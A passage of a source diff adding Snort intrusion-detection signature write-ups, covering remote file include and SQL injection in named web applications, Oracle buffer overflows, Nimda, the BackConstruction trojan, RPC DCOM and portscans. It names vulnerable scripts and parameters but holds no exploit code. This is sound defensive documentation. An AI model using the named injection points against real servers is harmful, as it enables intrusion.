+420
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Host Redirect datagram with an undefined ICMP code.
+
+--
+
+Impact:
+
+Undefined ICMP Code values should never be seen on the network.  This could be an indication of nefarious activity on the network.
+
+--
+
+Detailed Information:
+The Transparent Internet Routing for IP Mobile Hosts IETF draft defines ICMP Type 32 Code 0 as an ICMP Mobile Host Redirect Message.  This message was intended to be used by mobile computers to inform base-stations of their location on the network as they move from base-station to base-station.  In normal situations the ICMP Code should be set to 0, values other than 0 are undefined and should never be used.
+
+This IETF draft was never ratified, and no hardware is known to exist that generates this type of ICMP datagram
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 32 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000861.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000861
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "FlushCMS" application running on a webserver. Access to the file "class.rich.php" using a remote file being passed as the "class_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "class_path" parameter in the "class.rich.php" script used by the "FlushCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FlushCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2812.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2812
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_for_local_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000824.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000824
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VBZooM" application running on a webserver. Access to the file "sendmail.php" with SQL commands being passed as the "UserID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "UserID" parameter in the "sendmail.php" script used by the "VBZooM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZooM
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/122-23.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-23
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+filtered portsweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/100000679.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000679
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "index.php" using a remote file being passed as the 
+"func_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "func_prog" parameter in the "index.php" script used by 
+the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1298.txt
@@ -0,0 +1,52 @@
+Rule:
+
+Sid: 1289
+
+Summary:
+This event is generated when a TFTP GET request is made for Admin.dll.  This is normally an indication that a system on the network is infected with the W32/Nimda worm.
+
+Impact:
+In normal situations this is a good indication that the host transmitting the request has been compromised in the past by Code Red, Code Red II, or the sacmind/IIS worm.  All of these worms created backdoors that could allow remote attackers to run abitrary commands on the machine.
+
+Detailed Information:
+The Nimda worm propogates in several ways.  After it infects a host it begins scanning for other compromised hosts, sending infected emails, infecting .html files, and adding trojans to system binaries.  To further expose the infected system it enables sharing of the c: drive, creates a Guest account, and adds the guest account to the Administrators group.  
+
+Currently this rule searches for "Admin.dll" in TFTP GET requests.  This rule will detect hosts that have just been compromised by Nimba and are searching for Admin.dll to elevate its system privileges to Local/System.
+
+Affected Systems
+Windows 95
+Windows 98
+Windows ME
+Windows NT
+Windows 2000
+
+Attack Scenarios:
+Once W32/Nimba infects a compromised host it will make a request for "Admin.dll".  This binary file is used to elevate the privilege level of the W32/Nimba worm to Local/System, so it can begin infecting system files and other hosts.
+
+Ease of Attack:
+Simple.  Nimba uses backdoors left by other worms and trojans that target IIS.  A large number of scripts and exploits exist in the wild that mimic the behavior of the Nimba worm.
+
+False Positives:
+This rule is triggered by any TFTP GET request for Admin.dll, if this file name is being used during a legitimate TFTP session this rule will generate a false positive.
+
+False Negatives:
+This rule was created to catch the generic version of the W32/Nimba worm.  Any attacker who changes "Admin.dll" to a another filename will bypass this rule.
+
+Corrective Action:
+The host generating the request should be investigated for evidence of a compromise.  Check for the presence of root.exe, Admin.dll, and unexpected .eml or .nws files.  If it is determined that the system has been compromised the only safe way to recover the system is to format the system drives and re-install the system.  
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+Additional References
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
+
+CERT:
+http://www.cert.org/advisories/CA-2001-26.html
+http://www.cert.org/tech_tips/win-UNIX-system_compromise.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000475.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000475
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "meaning.php" with SQL commands being passed as the "ShowByQuranID" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "ShowByQuranID" parameter in the "meaning.php" script 
+used by the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2053.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2053
+
+--
+Summary:
+Versions of the software tracking system Bugzilla prior to 2.14.1 are 
+prone to a vulnerability that allows some degree of account hijacking.
+
+--
+Impact:
+False data may be represented in the bug tracking database.
+
+--
+Detailed Information:
+Versions of Bugzilla prior to 2.14.1 and cvs version 2.15 prior to 
+20020103 allow non-authorized users to post comments as any user of 
+their choosing, including non-valid usernames.
+
+A check to verify the user is valid when posting comments is not 
+performed correctly. Using this an attacker might post comments as 
+another user in the bugzilla database.
+
+--
+Affected Systems:
+Bugzilla versions prior to 2.14.1 and cvs versions prior to 2.15 (cvs20020103)
+
+--
+Attack Scenarios:
+The attacker can manually edit the page to pass his own version of 
+variables to the script handling the comments. This script in turn 
+passes the data directly to another script that handles the posting of 
+bugs without checking the user database.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Bugzilla to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0008
+
+Bugzilla:
+http://www.bugzilla.org/security/2.14.1/
+http://bugzilla.mozilla.org/show_bug.cgi?id=108385
+http://bugzilla.mozilla.org/show_bug.cgi?id=108516
+
+--
--- /dev/null
+++ b/doc/signatures/861.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+861
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/920.txt
@@ -0,0 +1,62 @@
+SID:
+920
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/152.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+152, 157-158
+
+--
+Summary:
+Backdoor.Backconstruction is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Backconstruction
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+	SID	Message
+	---	-------
+	152	BackConstruction 2.1 Connection (outgoing TCP
+connection)
+	157	BackConstruction 2.1 Client FTP Open Request (incoming
+TCP connection)
+	158	BackConstruction 2.1 Server FTP Open Reply (outging TCP
+connection)
+
+This Trojan is commonly used to install other Trojan programs.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Cmctl32.exe
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Shell = "<drive>:\WINDOWS\Cmctl32.exe"
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Cmctl32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS505
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/backc/21/index.shtml
+
+Pest Patrol:
+www.pestpatrol.com/PestInfo/b/back_construction.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1760.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1760
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+IDS system on the protected network is detected.
+
+--
+Impact:
+These tools may be used to compromise data on the network or may
+indicate mis-use of other IDS systems.
+
+--
+Detailed Information:
+This event indicates the use of an IDS tool. The source of the event
+should be investigated carefully. These tools may be used to gather data
+present in traffic on the protected network.
+
+--
+Affected Systems:
+	All networks.
+
+--
+Attack Scenarios:
+An unathorized user could use an IDS to gather data and observe traffic
+present on the network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2240.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2240
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in PDGSoft Shopping Cart.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Certain versions of PDGSoft Shopping Cart suffer from a buffer overflow 
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing.
+
+The vulnerable executable files are redirect.exe and changepw.exe, which
+can be accessed via the web interface.
+
+--
+Affected Systems:
+	PDGSoft Shopping Cart 1.50
+
+--
+Attack Scenarios:
+The attacker needs to supply an overly long string to either of the 
+affected executables.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1256
+
+--
--- /dev/null
+++ b/doc/signatures/283.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid: 283
+
+--
+Summary:
+Versions of the Netscape browser including and prior to 4.75 are vulnerable to a buffer overflow that may lead to a root shell listening on port 6968. This event is generated when a request is made to a web site exploiting this vulnerability.
+
+--
+Impact:
+System compromize presenting the attacker with the opportunity to
+gain remote access to the victim host.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the HTML parser on some versions of Netscape Navigator. It is possible for a remote attacker to gain a root shell on the victim host.
+
+A long password value in a form field may result in an attacker being able to execute arbitrary commands.
+
+Affected Systems:
+	Netscape Navigator 4.75 and prior
+
+--
+Attack Scenarios:
+The attacker would need to supply a link on a web page or HTML email that triggers the overflow.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1189
+
+Arachnids:
+http://www.whitehats.com/info/IDS215
+
+Bugtraq:
+http://www.securityfocus.com/bid/822
+
+--
--- /dev/null
+++ b/doc/signatures/3373.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3373
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2747.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2747
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1194.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1194
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000846.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000846
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Subberz Lite" application running on a webserver. Access to the file "user-func.php" using a remote file being passed as the "myadmindir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "myadmindir" parameter in the "user-func.php" script used by the "Subberz Lite" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Subberz Lite
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1291.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1291
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
